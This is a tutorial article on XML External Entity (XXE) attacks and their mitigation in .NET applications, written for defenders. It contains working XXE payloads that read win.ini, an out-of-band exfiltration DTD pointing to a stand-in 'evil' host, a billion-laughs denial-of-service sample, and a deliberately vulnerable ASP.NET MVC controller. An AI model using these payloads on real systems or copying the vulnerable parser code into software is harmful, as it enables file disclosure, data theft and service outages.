OWASP TOP 4: XML External Entities (XXE)

This is the fifth article in the OWASP Top 10 Series

Overview

At the time of writing, XML External Entities (XXE) is risk number 4 in the OWASP Top 10. As in the rest of this OWASP series, I'll try to scope the samples in this article to web applications built on .NET technologies (ASP.NET MVC, ASP.NET Web Forms, ASP.NET Core, Web API, WCF, EF, etc.), but the same principles also apply to Java, PHP, Node.js, and so on. The XML External Entities risk is new in the latest revision of the OWASP Top 10 (it was not present in the 2013 edition), and it earned its place at #4 on its own merits because of how prevalent it is in existing code. This type of attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser; in other words, when untrusted XML input is processed and its entities are resolved by the parser. Let's dive into the details of XXE.

Xml External Entities – Impacts

One of the reasons XXE sits at #4 is the number of derived risks it entails. Without being exhaustive, we can list the following:

Data Disclosure
External Request
Denial of Service
Port Scanning
Server Side Request Forgery
Remote Code Execution

These usually fall under either XXE Injection or XXE Expansion, as we will see shortly. In short, this is a really dangerous risk that must be taken into consideration.

Xml External Entities Explained

In terms of threat agents, attackers will try to exploit vulnerable (or legacy) XML parsers by uploading XML documents that carry a hostile payload, or by sending such documents directly to the application. Exploitability is classified as medium. XXE is common in existing code, partly because it has rarely been tested for and partly because of the lack of SAST, DAST or even IAST analysis. A simple SAST tool can detect the issue by inspecting dependencies and configuration. Detectability is therefore classified as high: as mentioned, the issue is easy to detect with modern AST tools. The technical impact falls into the severe category: once a vulnerable parser has been exploited, multiple risks arise, such as the ones listed in the previous section, so corrective action should be taken as soon as possible.

From the OWASP document we see:

Xml Basics regarding XXE

To understand XXE properly, we will first review a few XML basics. As every developer knows, XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. Much of XML's success comes from its flexibility and from the ability to define your own building blocks and entities, some of which can be physically defined in a separate file by means of DTDs (Document Type Definitions).

XML is a markup language, which basically means that content is kept separate from the markup instructions that describe it. These instructions are semantic constructs inherited from SGML (Standard Generalized Markup Language), and XML was designed to be clear, easy to create and easy to process with XML parsers.

Because XML derives from SGML, it also supports DTDs, an optional part of XML that describes a class of documents by means of markup declarations that provide a specific grammar. According to Wikipedia: “A DTD defines the valid building blocks of an XML document. It defines the document structure with a list of validated elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.”

Source code

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- the XHTML document body starts here-->
<html xmlns="http://www.w3.org/1999/xhtml">
 ...
</html>

A DTD is linked to an XML document through a DOCTYPE declaration (as shown above) and can be provided in two ways: as an internal subset or as an external subset.

In a DTD we can also define entities. According to Wikipedia: “An entity is similar to a macro. The entity declaration assigns it a value that is retained throughout the document. A common use is to have a name more recognizable than a numeric character reference for an unfamiliar character.”

Source code

<!DOCTYPE sgml [
  <!ELEMENT sgml ANY>
  <!ENTITY % std       "standard SGML">
  <!ENTITY % signature " — &author;.">
  <!ENTITY % question  "Why couldn’t I publish my books directly in standard SGML?">
  <!ENTITY % author    "William Shakespeare">
]>

So entities can be thought of as placeholders, much like variables, and they come in several kinds:

Regular Entities: used for text substitution
Predefined Entities: built into XML, such as &amp;, &lt; and &gt;
External Entities: declared with SYSTEM or PUBLIC, they can point to resources inside or outside the server (this is where things become dangerous)

Source code

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE person [
<!ENTITY Surname "Surname">
]>

<person>
	&Surname;
</person>

The problem arises when parsers dereference these entities, substituting each reference with the entity's value.
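As a rough illustration of that substitution, the following C# sketch parses a document with an inline DTD and returns the text after the parser has replaced the entity reference. The class and method names (EntityExpansionDemo, ExpandedText) are hypothetical, and DTD processing is switched on explicitly only for the sake of the demo; external resolution stays disabled.

```csharp
using System;
using System.IO;
using System.Xml;

public static class EntityExpansionDemo
{
    // Parses XML with DTD processing explicitly enabled and returns the text
    // content of the root element after entity substitution.
    public static string ExpandedText(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse, // allow the inline DTD (demo only)
            XmlResolver = null                   // never fetch external resources
        };

        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            var doc = new XmlDocument();
            doc.Load(reader);
            return doc.DocumentElement.InnerText.Trim();
        }
    }
}
```

Feeding it the person document shown above should return the entity's value rather than the literal reference, which is exactly the behaviour an attacker relies on once the entity points somewhere sensitive.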

Note: there is a common misconception here about XML validation. A well-formedness check says nothing about whether the DTD or the entities a document declares are trustworthy: a document carrying a hostile entity declaration can be perfectly well-formed, and the parser will still process it.

XXE Types

XXE occurs when untrusted input inside an XML file is processed by an XML parser and included in the application's processing. The vulnerability arises when this untrusted input sits in the DTD or in the entities. At this point we can distinguish between two types of attack: XML External Entity Injection and XML External Entity Expansion. Let's review each one in detail:

XML External Entity Injection (XXE Injection)

With XXE Injection, attackers try to disclose information from the server, retrieving sensitive data such as passwords. To do so, they place a malicious payload in the DTD that requests an internal resource.

They will also try to request external resources, so that the server running the parser issues requests to other servers. Within this category, attackers may also attempt remote code execution.

Some examples of this kind of XXE vulnerability (which we will review in detail in the ASP.NET sample) are:

Source code

<?xml version="1.0"?>
<!DOCTYPE funwithxxe [
  <!ELEMENT funwithxxe ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<funwithxxe>&xxe;</funwithxxe>

Source code

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://evil/evil.xml">
  <!-- the attacker-hosted evil.xml is expected to declare the "all" entity
       by concatenating the start, stuff and end parameter entities -->
  %dtd;
]>
<root>&all;</root>

XML External Entity Expansion (XXE Expansion)

XXE Expansion is similar, but here attackers try to exhaust the resources of the server that processes the XML file. To do so, they include as many entity references as they can, using well-known nested-entity techniques such as the popular “billion laughs” attack or the quadratic blowup.

Billion Laughs Attack

Source code

<?xml version="1.0"?>
<!DOCTYPE data [
	<!ENTITY a0 "dos" >
	<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
	<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
	<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
	<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
	]>
	<data>&a4;</data>
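To get a feel for why such a small document is dangerous, the growth can be worked out by hand: every level multiplies the previous one by the number of references it contains. The C# sketch below does that arithmetic; the class and method names (EntityMath, ExpandedLength) are hypothetical and nothing is parsed here.

```csharp
using System;

public static class EntityMath
{
    // Length of the fully expanded text when a base string of baseLength
    // characters is wrapped in `levels` entities, each one referencing the
    // previous entity `fanOut` times.
    public static long ExpandedLength(int baseLength, int fanOut, int levels)
    {
        long length = baseLength;
        for (int i = 0; i < levels; i++)
        {
            length = checked(length * fanOut); // throws instead of silently overflowing
        }
        return length;
    }
}
```

For the sample above (a 3-character base string, 10 references per entity, 4 levels from a1 to a4), ExpandedLength(3, 10, 4) gives 30,000 characters. Adding five more levels in the same style, which costs the attacker only five extra lines, gives 3,000,000,000 characters.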

Let's now see XXE in action with a detailed sample:

XXE in Action: ASP.NET MVC Sample

After reviewing the basics of XXE, let's look at a small ASP.NET MVC application that is vulnerable to XXE by default.

Here we create a dummy MVC structure with a couple of views, Details.cshtml and XmlIndex.cshtml, inside the Xml folder, plus a very basic XmlController that puts the default XML parser to work.

The controller code is really simple: it dispatches on the button that was pressed, parses the requested XML file and passes the result to the Details view:

Source code

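using System;
using System.IO;
using System.Web.Mvc;
using System.Xml;

public class XmlController : Controller
{
    // Resolves the requested file name inside the uploads folder
    private string GetSourcePath(string filename)
    {
        var dir = new DirectoryInfo(Server.MapPath("~/App_Data/uploads/"));
        return Path.Combine(dir.FullName, filename);
    }

    // Parses the file with XmlDocument.Load and its default settings (vulnerable)
    public ActionResult Load(string filename)
    {
        try
        {
            XmlDocument xmlDoc = new XmlDocument();
            xmlDoc.Load(GetSourcePath(filename));

            ViewBag.Value = String.Format("Processed XML: {0} ", xmlDoc.InnerText);
            return View("Details");
        }
        catch (Exception)
        {
            // more exception handling here if needed
            return HttpNotFound();
        }
    }

    // Parses the file content with XmlDocument.LoadXml and its default settings (vulnerable)
    public ActionResult LoadXml(string filename)
    {
        try
        {
            XmlDocument xmlDoc = new XmlDocument();
            // System.IO.File is fully qualified because Controller has its own File method
            xmlDoc.LoadXml(System.IO.File.ReadAllText(GetSourcePath(filename)));

            ViewBag.Value = String.Format("Processed XML: {0} ", xmlDoc.InnerText);
            return View("Details");
        }
        catch (Exception)
        {
            // more exception handling here if needed
            return HttpNotFound();
        }
    }

    // Dispatches to the parsing action selected by the submit button
    public ActionResult XmlGeneral(string queryType, string fileName)
    {
        if (queryType == "Load")
        {
            return Load(fileName);
        }
        else if (queryType == "LoadXml")
        {
            return LoadXml(fileName);
        }
        else
        {
            return HttpNotFound();
        }
    }
}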

The code for XmlIndex.cshtml, which triggers these actions, is also simple; something similar to:

Source code

@{
    ViewBag.Title = "Xml ParserMethods Page : ";
}
 
@model List<string>
<h2>Xml Parser Methods Page</h2>
 
 
<div style="margin-left:auto; margin-right: auto; ">
 
    <div class="col-md-12" style="border:solid;border-width:1px;padding-top:20px; padding-bottom:20px;">
        @using (Html.BeginForm("XmlGeneral", "Xml", FormMethod.Post, new { @class = "form-horizontal", role = "form" }))
            {
            @Html.ValidationSummary()
 
            <p style="font-size:16px; color:#7b8598;"><u><b>XmlDocument Class Section</b></u></p>
                <br />
                <div >
 
                    <div style="width:810px;padding-bottom:5px;">
                        <p style="width:50%;float:left;position:relative">
                            @Html.Label("FileName: ")
                            @Html.TextBox("FileName", "userscheme.xml" , new { @class = "form-control" })
                        </p>
                    </div>
 
                    <div style="padding-top:65px;padding-bottom:45px;">
                        <p style="float:left;">
                            <button type="submit" name="queryType" value="Load" class="btn btn-default">Run Load</button>
                            <button type="submit" name="queryType" value="LoadXml" class="btn btn-default">Run LoadXml</button>
                        </p>
                    </div>
 
                    <div style="background-color:ButtonFace ;font-size:12px; padding-top:20px;padding-bottom:10px;">
                        <ul>
                            <li><i><b>Run Load</b> This action invokes logic for running Vulnerable XmlDocument.Load method</i></li>
                            <li><i><b>Run LoadXml</b> This action invokes logic for running Vulnerable XmlDocument.LoadXml method</i></li>
                        </ul>
                    </div>
 
                </div>
        }
 
    </div>
 
    </div>

The code for the Details.cshtml view is trivial:

Source code

@{
    string value = ViewBag.Value;
}
 
<div>
    <hr />
    <dl class="dl-horizontal">
        <h3><b>Value:</b>@value</h3>
    </dl>
</div>

Now that the supporting actors have been introduced, it's time to present the main one: the userScheme.xml file, which in its most basic form looks something like:

Source code

<?xml version="1.0"?>
<!DOCTYPE person [
<!ENTITY surname "This is the surname file from entity definition">
]>
<UserScheme xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<person>
	&surname;
</person>
</UserScheme>

Let's see what happens when our dummy XmlController processes this XML:

Really dangerous: the entity has been processed without any restriction by the default XmlDocument.Load() behaviour!

Let's see what happens if we include a malicious directive in the entity declarations, something like:

Source code

<?xml version="1.0"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
 <foo>&xxe;</foo>

If we run the LoadXml action, the parser resolves the entity and the content of win.ini ends up in the rendered view.

This is a textbook case of data disclosure. From here it is clear that an attacker could perform more dangerous actions, such as collecting internal server information and sending it to servers under their control, or exhausting the server with XML bombs.

If you are curious about potential malicious payloads, you can visit (among others):

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

XXE Risky Scenarios and General Recommendations

From a general perspective, risky scenarios arise when:

Your code processes XML data
User-defined DTDs are accepted as untrusted input by your parsers
Entities are dereferenced as part of XML data processing

Accordingly, the general recommendations for code review are the following:

Review your XML parsers and check whether your .NET Framework version is 4.5.2 or later; if not, chances are that your parsers are vulnerable
Check whether your XML input is sanitized before being processed
Check whether DTDs are allowed by your parsers and, if so, make sure that the allowed DTDs never come from an untrusted source (no user-defined DTD should be allowed). DTDs are a valid mechanism, but from a security perspective users should never be able to provide them
Check whether external entities are allowed
Limit the memory and resources available for XML processing

Mitigating XXE

In addition to the recommendations above (which constitute the first line of a defence-in-depth strategy), we will now list some general mitigation techniques that focus on the heart of the XXE vulnerability: XML parsers processing user-provided DTDs and external entities.

So, from there:

Deactivate the DTD loading feature of your parsers whenever possible
Deactivate the external entity loading feature whenever possible
Update your XML parser libraries (modern XML libraries deactivate DTDs and external entities by default)
Some frameworks allow DTD and external entity loading to be enabled only from specific sources
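For the last point, one possible approach in .NET is a custom resolver that refuses anything outside an allow-list. The sketch below is only an illustration under stated assumptions: the names AllowListXmlResolver and AllowListSettings are hypothetical, only the synchronous GetEntity path is covered, and internal entities declared inside the document are still expanded, so it does not protect against expansion attacks on its own.

```csharp
using System;
using System.Collections.Generic;
using System.Xml;

// Resolver that only fetches external resources whose absolute URI
// appears in an explicit allow-list (hypothetical helper).
public sealed class AllowListXmlResolver : XmlUrlResolver
{
    private readonly HashSet<string> _allowed = new HashSet<string>(StringComparer.Ordinal);

    public AllowListXmlResolver(IEnumerable<string> allowedUris)
    {
        foreach (var uri in allowedUris)
        {
            // Store the normalized form so comparisons are consistent
            _allowed.Add(new Uri(uri).AbsoluteUri);
        }
    }

    public bool IsAllowed(Uri absoluteUri)
    {
        return absoluteUri != null && _allowed.Contains(absoluteUri.AbsoluteUri);
    }

    public override object GetEntity(Uri absoluteUri, string role, Type ofObjectToReturn)
    {
        if (!IsAllowed(absoluteUri))
        {
            throw new XmlException("External resource not allowed: " + absoluteUri);
        }
        return base.GetEntity(absoluteUri, role, ofObjectToReturn);
    }
}

public static class AllowListSettings
{
    // Reader settings that accept DTDs but resolve only allow-listed URIs
    public static XmlReaderSettings Create(params string[] allowedUris)
    {
        return new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,
            XmlResolver = new AllowListXmlResolver(allowedUris)
        };
    }
}
```

A reader created with AllowListSettings.Create("https://example.com/schemas/person.dtd") (a made-up URL) would then fail with an XmlException as soon as a document tried to pull in file:///c:/windows/win.ini or any other resource that is not on the list.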

From the .NET perspective, if you use XPathNavigator, XmlTextReader or XmlDocument on a framework version prior to 4.5.2, your code is vulnerable by default; in other words, DTDs and external entities are accepted from untrusted input. If this is the case, the recommended action is to disable external entity resolution in code, something similar to:

Source code

XmlDocument doc = new XmlDocument();
doc.XmlResolver = null;
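If the application never needs DTDs at all, a stricter variant is to reject them outright. The following is a minimal sketch, assuming .NET Framework 4.0 or later (where DtdProcessing is available); the SafeXml class and LoadWithoutDtd method are hypothetical names, not part of the sample application.

```csharp
using System.IO;
using System.Xml;

public static class SafeXml
{
    // Loads XML into an XmlDocument while rejecting any document that
    // contains a DOCTYPE. The caller remains responsible for disposing input.
    public static XmlDocument LoadWithoutDtd(TextReader input)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // a DOCTYPE raises XmlException
            XmlResolver = null                      // no external resolution either
        };

        var doc = new XmlDocument { XmlResolver = null };
        using (var reader = XmlReader.Create(input, settings))
        {
            doc.Load(reader);
        }
        return doc;
    }
}
```

With this helper, a plain document loads as usual, while the win.ini payload shown earlier is refused with an XmlException before any entity is resolved.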

There are, of course, other .NET XML components that are secure by default regardless of the framework version. These are the following:

LINQ to XML components, XmlDictionaryReader, XmlNodeReader, XmlReader and XslCompiledTransform

We can also protect our .NET applications from XXE expansion by using the XmlReaderSettings class and setting its MaxCharactersInDocument property (MaxCharactersFromEntities additionally caps the characters produced by entity expansion).
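A minimal sketch of those limits follows, for the case where DTDs must stay enabled. The BoundedXml class, the TryReadWithLimits method and the limit values passed by the caller are assumptions for illustration; suitable limits depend on the documents your application legitimately receives.

```csharp
using System.IO;
using System.Xml;

public static class BoundedXml
{
    // Parses XML with DTDs enabled but with hard caps on entity expansion
    // and on total document size. Returns false when the parser rejects the
    // input, for example because one of the limits was exceeded.
    public static bool TryReadWithLimits(string xml, long maxEntityChars,
                                         long maxDocumentChars, out string text)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,
            XmlResolver = null,                         // still no external resources
            MaxCharactersFromEntities = maxEntityChars, // cap on expanded entity text
            MaxCharactersInDocument = maxDocumentChars  // cap on the whole document
        };

        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml), settings))
            {
                var doc = new XmlDocument();
                doc.Load(reader);
                text = doc.DocumentElement.InnerText;
                return true;
            }
        }
        catch (XmlException)
        {
            text = null;
            return false;
        }
    }
}
```

Called on the billion laughs sample with a small entity limit such as 1024, the method should return false instead of building the expanded text in memory.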

Improving defences

To reduce (or even avoid) manual review of your code, you can use a professional SAST tool to identify where your vulnerabilities are and take corrective action. You can implement an even better solution by combining IAST (for detection) with RASP (for protection).